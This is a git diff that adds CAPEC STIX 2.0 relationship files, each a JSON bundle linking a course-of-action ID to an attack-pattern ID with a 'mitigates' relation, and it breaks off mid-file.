a/capec/relationship/relationship--137d1e59-52d9-421d-be20-071fd187f49c.json b/capec/relationship/relationship--137d1e59-52d9-421d-be20-071fd187f49c.json new file mode 100644 index 0000000000..0a725c44e0 --- /dev/null +++ b/capec/relationship/relationship--137d1e59-52d9-421d-be20-071fd187f49c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6fa809d1-d7a2-45b1-9baf-137d48beafcc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--137d1e59-52d9-421d-be20-071fd187f49c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2", + "target_ref": "attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35.json b/capec/relationship/relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35.json new file mode 100644 index 0000000000..dbdae811ea --- /dev/null +++ b/capec/relationship/relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ab87b510-5f06-4426-b8e7-1fb75ab1ab2e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30", + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--13d97a1d-7ced-4f30-bf94-573c1209abde.json b/capec/relationship/relationship--13d97a1d-7ced-4f30-bf94-573c1209abde.json new file mode 100644 index 0000000000..ba91506f3f --- /dev/null +++ b/capec/relationship/relationship--13d97a1d-7ced-4f30-bf94-573c1209abde.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2fc156de-9b28-4f3e-8f39-b1994e14d49c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13d97a1d-7ced-4f30-bf94-573c1209abde", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356", + "target_ref": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--14079416-a0e8-4923-9eda-2849d1b430ee.json b/capec/relationship/relationship--14079416-a0e8-4923-9eda-2849d1b430ee.json new file mode 100644 index 0000000000..0c9ce85fa7 --- /dev/null +++ b/capec/relationship/relationship--14079416-a0e8-4923-9eda-2849d1b430ee.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4a4882a4-d6d2-4f33-8360-52583ab49fbe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--14079416-a0e8-4923-9eda-2849d1b430ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d", + "target_ref": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--14a6218e-49e6-4932-a764-e62962e4b779.json b/capec/relationship/relationship--14a6218e-49e6-4932-a764-e62962e4b779.json new file mode 100644 index 0000000000..1f69336c76 --- /dev/null +++ b/capec/relationship/relationship--14a6218e-49e6-4932-a764-e62962e4b779.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--76142bbd-9a7d-417a-b79c-f413518dd7b1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--14a6218e-49e6-4932-a764-e62962e4b779", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--14b39aa2-a729-45e4-908e-93c06137a89b.json b/capec/relationship/relationship--14b39aa2-a729-45e4-908e-93c06137a89b.json new file mode 100644 index 0000000000..09df4dd7f6 --- /dev/null +++ b/capec/relationship/relationship--14b39aa2-a729-45e4-908e-93c06137a89b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f1d49580-1638-4e17-a7ff-e17337906732", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--14b39aa2-a729-45e4-908e-93c06137a89b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--14d99e66-93e6-481c-ad94-22819118abe4.json b/capec/relationship/relationship--14d99e66-93e6-481c-ad94-22819118abe4.json new file mode 100644 index 0000000000..f43263de66 --- /dev/null +++ b/capec/relationship/relationship--14d99e66-93e6-481c-ad94-22819118abe4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f5bc412b-ca2e-4074-9a80-b10757eaecb3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--14d99e66-93e6-481c-ad94-22819118abe4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460", + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e.json b/capec/relationship/relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e.json new file mode 100644 index 0000000000..4043d2a19c --- /dev/null +++ b/capec/relationship/relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--31df9ac4-e226-4d3b-bd02-8bc7701af2d2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31", + "target_ref": "attack-pattern--81be8f89-928c-47bc-9dff-95f503ea0e82", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b.json b/capec/relationship/relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b.json new file mode 100644 index 0000000000..a4d0b831cd --- /dev/null +++ b/capec/relationship/relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f631c82a-43b9-4ca5-8f09-9fd97dcd2f7d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109", + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--166618a5-698e-411e-94e1-e1d879d19a95.json b/capec/relationship/relationship--166618a5-698e-411e-94e1-e1d879d19a95.json new file mode 100644 index 0000000000..18821d1ca6 --- /dev/null +++ b/capec/relationship/relationship--166618a5-698e-411e-94e1-e1d879d19a95.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e0920a0b-0f6a-4f9b-9f7d-9a91b64b630c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--166618a5-698e-411e-94e1-e1d879d19a95", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac", + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--171b92d3-4d57-42c4-bda5-f7f86528e143.json b/capec/relationship/relationship--171b92d3-4d57-42c4-bda5-f7f86528e143.json new file mode 100644 index 0000000000..4419c22f1a --- /dev/null +++ b/capec/relationship/relationship--171b92d3-4d57-42c4-bda5-f7f86528e143.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f6072723-2ddb-4e54-acd0-9cbe53fc512c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--171b92d3-4d57-42c4-bda5-f7f86528e143", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--767f4e01-7e92-4db1-84d7-851067a97406", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d.json b/capec/relationship/relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d.json new file mode 100644 index 0000000000..aa905fec7d --- /dev/null +++ b/capec/relationship/relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0f8297e1-41ed-449e-90cf-549d53525957", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8", + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--18006d48-8c85-41bc-a8c7-5b349247540c.json b/capec/relationship/relationship--18006d48-8c85-41bc-a8c7-5b349247540c.json new file mode 100644 index 0000000000..a2d13cadc0 --- /dev/null +++ b/capec/relationship/relationship--18006d48-8c85-41bc-a8c7-5b349247540c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b1f36b1c-ced0-4cb9-a18a-f61c294e5c61", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--18006d48-8c85-41bc-a8c7-5b349247540c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb", + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--18a18868-d0bc-4868-a2b4-6a0eca4aba7c.json b/capec/relationship/relationship--18a18868-d0bc-4868-a2b4-6a0eca4aba7c.json new file mode 100644 index 0000000000..c048ffbec9 --- /dev/null +++ b/capec/relationship/relationship--18a18868-d0bc-4868-a2b4-6a0eca4aba7c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--95976a5a-8339-4504-ae08-d40f9da534dd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--18a18868-d0bc-4868-a2b4-6a0eca4aba7c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b669e453-8bfb-4dd3-bee9-992473335348", + "target_ref": "attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--19a8a4e0-cf9b-45e5-a856-3de57b5b1054.json b/capec/relationship/relationship--19a8a4e0-cf9b-45e5-a856-3de57b5b1054.json new file mode 100644 index 0000000000..c14ece02f9 --- /dev/null +++ b/capec/relationship/relationship--19a8a4e0-cf9b-45e5-a856-3de57b5b1054.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dc3ed2ff-9488-41eb-ae1c-48905bcf413d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--19a8a4e0-cf9b-45e5-a856-3de57b5b1054", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", + "target_ref": "attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--19a97228-07cd-41cf-9b77-4d3003b74062.json b/capec/relationship/relationship--19a97228-07cd-41cf-9b77-4d3003b74062.json new file mode 100644 index 0000000000..f263250f25 --- /dev/null +++ b/capec/relationship/relationship--19a97228-07cd-41cf-9b77-4d3003b74062.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--70132d5f-7f30-4818-806c-06c06b76a8e0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--19a97228-07cd-41cf-9b77-4d3003b74062", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1a780b0b-c16d-44dc-828d-1ff6d4616cb1.json b/capec/relationship/relationship--1a780b0b-c16d-44dc-828d-1ff6d4616cb1.json new file mode 100644 index 0000000000..273c0b3617 --- /dev/null +++ b/capec/relationship/relationship--1a780b0b-c16d-44dc-828d-1ff6d4616cb1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dd122a15-470e-4a5a-bd59-8ab6888cbadf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1a780b0b-c16d-44dc-828d-1ff6d4616cb1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07", + "target_ref": "attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1a7a10fe-b358-4927-9821-52ae29e5485c.json b/capec/relationship/relationship--1a7a10fe-b358-4927-9821-52ae29e5485c.json new file mode 100644 index 0000000000..2af51bedde --- /dev/null +++ b/capec/relationship/relationship--1a7a10fe-b358-4927-9821-52ae29e5485c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8cdf8f99-bffb-42c8-a104-d7ded9893cdf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1a7a10fe-b358-4927-9821-52ae29e5485c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1ae6475a-bf31-49ee-b0c2-f878f33ed3ff.json b/capec/relationship/relationship--1ae6475a-bf31-49ee-b0c2-f878f33ed3ff.json new file mode 100644 index 0000000000..d2d8252aa1 --- /dev/null +++ b/capec/relationship/relationship--1ae6475a-bf31-49ee-b0c2-f878f33ed3ff.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e89fee5b-4a3b-48db-8963-2b5d67a0933a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1ae6475a-bf31-49ee-b0c2-f878f33ed3ff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8", + "target_ref": "attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3.json b/capec/relationship/relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3.json new file mode 100644 index 0000000000..4a12470541 --- /dev/null +++ b/capec/relationship/relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8396b577-8f8a-48e0-97d3-4ab807eb427d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595.json b/capec/relationship/relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595.json new file mode 100644 index 0000000000..957d71a72d --- /dev/null +++ b/capec/relationship/relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f212905b-4f8e-4c7e-9570-da89a198c186", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c", + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed.json b/capec/relationship/relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed.json new file mode 100644 index 0000000000..63f99ebe8d --- /dev/null +++ b/capec/relationship/relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fdec8d37-f103-4d5f-a9aa-10b96c13b967", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1bb6b392-107e-411c-9afb-54d84e17531c.json b/capec/relationship/relationship--1bb6b392-107e-411c-9afb-54d84e17531c.json new file mode 100644 index 0000000000..bffa8e3eff --- /dev/null +++ b/capec/relationship/relationship--1bb6b392-107e-411c-9afb-54d84e17531c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d13d0157-68f2-4a33-92b7-fe303e66d58a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1bb6b392-107e-411c-9afb-54d84e17531c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d", + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1bbed2f9-90b0-4ce2-a6b9-2f6355369294.json b/capec/relationship/relationship--1bbed2f9-90b0-4ce2-a6b9-2f6355369294.json new file mode 100644 index 0000000000..317be47449 --- /dev/null +++ b/capec/relationship/relationship--1bbed2f9-90b0-4ce2-a6b9-2f6355369294.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9960066f-43bf-4cfb-9aaa-a498b520a0f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1bbed2f9-90b0-4ce2-a6b9-2f6355369294", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44", + "target_ref": "attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1c0dc8fb-b6e9-4f03-a461-a75469ecaf9b.json b/capec/relationship/relationship--1c0dc8fb-b6e9-4f03-a461-a75469ecaf9b.json new file mode 100644 index 0000000000..34924d9a1a --- /dev/null +++ b/capec/relationship/relationship--1c0dc8fb-b6e9-4f03-a461-a75469ecaf9b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--427e1140-d914-4a7e-885f-d6ac326a3835", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1c0dc8fb-b6e9-4f03-a461-a75469ecaf9b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33", + "target_ref": "attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f.json b/capec/relationship/relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f.json new file mode 100644 index 0000000000..7fa58ccec9 --- /dev/null +++ b/capec/relationship/relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6bf13dfd-3019-498f-b017-1a23bd14dda1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb", + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1d6ecefe-10f4-467f-baed-296badec1094.json b/capec/relationship/relationship--1d6ecefe-10f4-467f-baed-296badec1094.json new file mode 100644 index 0000000000..dd4228c279 --- /dev/null +++ b/capec/relationship/relationship--1d6ecefe-10f4-467f-baed-296badec1094.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--26527920-cc3c-4dd0-92c2-b978c128547d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1d6ecefe-10f4-467f-baed-296badec1094", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "target_ref": "attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1db8d2bb-e3dd-4039-922c-f922ffc07e93.json b/capec/relationship/relationship--1db8d2bb-e3dd-4039-922c-f922ffc07e93.json new file mode 100644 index 0000000000..874ac0fb65 --- /dev/null +++ b/capec/relationship/relationship--1db8d2bb-e3dd-4039-922c-f922ffc07e93.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--73adddbe-b1a4-4d65-ae4a-b1223c3e3807", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1db8d2bb-e3dd-4039-922c-f922ffc07e93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + 